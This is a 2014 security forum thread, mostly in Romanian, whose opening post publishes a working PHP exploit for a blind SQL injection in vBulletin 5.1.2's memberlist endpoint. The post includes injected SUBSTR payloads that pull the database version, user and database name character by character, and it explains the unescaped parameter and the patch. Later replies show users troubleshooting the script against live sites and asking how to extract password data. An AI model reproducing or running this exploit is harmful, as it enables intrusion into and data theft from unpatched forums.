Nytro Posted July 20, 2014 Report Posted July 20, 2014 (edited) Some idiots are trying to sell it: http://1337day.com/exploits/22452For 2000 $. Gay Here it is. Free. [phpcode]<?php/* Author: Nytro Powered by: Romanian Security Team Price: Free. Educational.*/error_reporting(E_ALL);ini_set('display_errors', 1);// Get arguments$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';$expression = str_replace('/', '\\/', $target_url);// Function to send a POST requestfunction httpPost($url,$params){ $ch = curl_init($url); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Accept: application/json, text/javascript, */*; q=0.01', 'X-Requested-With: XMLHttpRequest', 'Referer: https://rstforums.com/v5/memberlist', 'Accept-Language: en-US,en;q=0.5', 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' )); $output = curl_exec($ch); if($output == FALSE) print htmlspecialchars(curl_error($ch)); curl_close($ch); return $output;}// Function to get string between two other stringsfunction get_string_between($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len);}// Get versionprint "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";print "Version: ";$result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');$letter = 1;while(strpos($result, 'No Users Matched Your Query') == false){ $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');}// Get userprint "\r\nUser: ";$result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');$letter = 1;while(strpos($result, 'No Users Matched Your Query') == false){ $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');}// Get databaseprint "\r\nDatabse: ";$result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');$letter = 1;while(strpos($result, 'No Users Matched Your Query') == false){ $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');}print "\r\n"?>[/phpcode]More details:The query was the following:SELECT user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options, user.posts, user.joindate, user.usertitle,user.reputation, session.lastactivity AS lastvisit, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid FROM user AS user LEFT JOIN session AS session ON session.userid = user.userid WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%" GROUP BY user.userid ORDER BY user.username ASC LIMIT 0, 10;The "D" is the controlled parameter. And, the quote (") was NOT escaped.The query was generated with a function from querydefs.php:public function fetchMemberList($params, $db, $check_only = false)The vulnerable code: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $params['startswith'] . '%"'; } }And the patch contains the fix: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"'; } }So now, the value is escaped and SQL Injection is fixed.vBulletin team moved really fast in fixing this problem.More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst Edited July 20, 2014 by Nytro Quote
Byte-ul Posted July 20, 2014 Report Posted July 20, 2014 haha, pana si filmuletul este tot al tau )good job Trimite-le mail celor de la 1337day si spune-le sa il scoata. Quote
Nytro Posted July 20, 2014 Author Report Posted July 20, 2014 Nop, sa se faca de ras. Dupa cum se vede, e BANAL exploit-ul. Si nu e util, sunt prea putine forumuri cu vBulletin 5.O sa aduc mai multe detalii cand ajung la Bucuresti. Quote
.Breacker Posted July 20, 2014 Report Posted July 20, 2014 Aia de la 1337day nu au ce manca ? @Nytro , acum o sa vezi numai showoff-uri de calitate ,multi au forumuri de gaming care au ca platforma vBulletin. Quote
io.kent Posted July 20, 2014 Report Posted July 20, 2014 Ador noutatea asta Nytro de la mine pe tine o halba uriasa de bere Quote
cybermist Posted July 20, 2014 Report Posted July 20, 2014 Php Falat error: Call to undefined function curl_init() in root/phpfilename.php Help!! Quote
Moderators Dragos Posted July 20, 2014 Moderators Report Posted July 20, 2014 Php Falat error: Call to undefined function curl_init() in root/phpfilename.php Help!!How to enable cURL in PHP / XAMPP - Stack Overflow Quote
pr0fw3b Posted July 20, 2014 Report Posted July 20, 2014 Acuma "hackerii" asteapta cat mai multi cu vBulletin 5.1.2 . Dar faza e ca multi cumpara cu o varianta mai in urma si asteapta degeaba uni ca nu prea o sa exploateze nimic . Quote
kumudam Posted July 20, 2014 Report Posted July 20, 2014 eroareNotice: Undefined offset: 1 in /root/script.php on line 90PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91 Quote
SirGod Posted July 20, 2014 Report Posted July 20, 2014 eroareNotice: Undefined offset: 1 in /root/script.php on line 90PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91Trebuie sa il rulezi din consola.php script.php http://site.com/forum Quote
cybermist Posted July 20, 2014 Report Posted July 20, 2014 Notice: Undefined offset: 1 in /root/vbexploit.php on line 179PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181 help Quote
.Breacker Posted July 20, 2014 Report Posted July 20, 2014 Notice: Undefined offset: 1 in /root/vbexploit.php on line 179PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181 helpA postat si SirGod mai sus. php exploitname.php http://www.yourwebsite.com/forum Quote
cybermist Posted July 20, 2014 Report Posted July 20, 2014 A postat si SirGod mai sus. php exploitname.php http://www.yourwebsite.com/forumdone samething but still error Quote
kumudam Posted July 20, 2014 Report Posted July 20, 2014 aceasi eroare la liniile 90 si 91 -oare ce o fi?merci de orice ajutor Quote
askwrite Posted July 20, 2014 Report Posted July 20, 2014 Trebuie sa-l rulati din consola, ce nu intelegeti? Quote
kumudam Posted July 20, 2014 Report Posted July 20, 2014 din consola il rulez ... in consola imi apare eroare, in loc de rezultat - ce nu intelegi??? Quote
SirGod Posted July 20, 2014 Report Posted July 20, 2014 Nu mai incercati pe alte versiuni de vBulletin si o sa mearga. Scriptul cauta dupa un text anume, text ce nu se regaseste pe toate versiunile. while(strpos($result, 'No Users Matched Your Query') == false) Quote
Gorkha Posted July 20, 2014 Report Posted July 20, 2014 Showing errorNotice: Uninitialized string offset: 0 in C:\xampp\htdocs\test\vb.php on line 91after Uncomment ;extension=php_curl.dllin php.ini Quote
nacks Posted July 20, 2014 Report Posted July 20, 2014 (edited) Am incercat si eu pe 5.1.2, dar primesc o eroare:Notice: Undefined variable: username in /root/nytro.php on line 90PHP Notice: Undefined variable: username in /root/nytro.php on line 91L.E: cred ca tine de link'ul in care se face "injectia" ... Edited July 20, 2014 by nacks Quote
kempactick Posted July 20, 2014 Report Posted July 20, 2014 Te pomenesti ca il cumpara cineva cu 2000$, el fiind deja publicat de Nytro. )) Quote
Nytro Posted July 20, 2014 Author Report Posted July 20, 2014 (edited) Nota: danyweb a reusit sa il descopere inaintea tiganilor de la 1337gay. Si nu l-a facut public, nu a incercat sa il vanda... Edit: Am adaugat detalii. Edited July 20, 2014 by Nytro Quote
jdsmith321 Posted July 20, 2014 Report Posted July 20, 2014 this is cool man, you got my respect Quote
wor1 Posted July 21, 2014 Report Posted July 21, 2014 Is there any protection on the password columns?select salt from user where userid='1' (works)select password from user where userid='1' (not works)Thanks for the exploit nice found Quote
k3nt_black Posted July 22, 2014 Report Posted July 22, 2014 root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/Romanian Security Team - vBulltin 5.1.2 SQL InjectionVersion: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93how fix mr Nytro ? Quote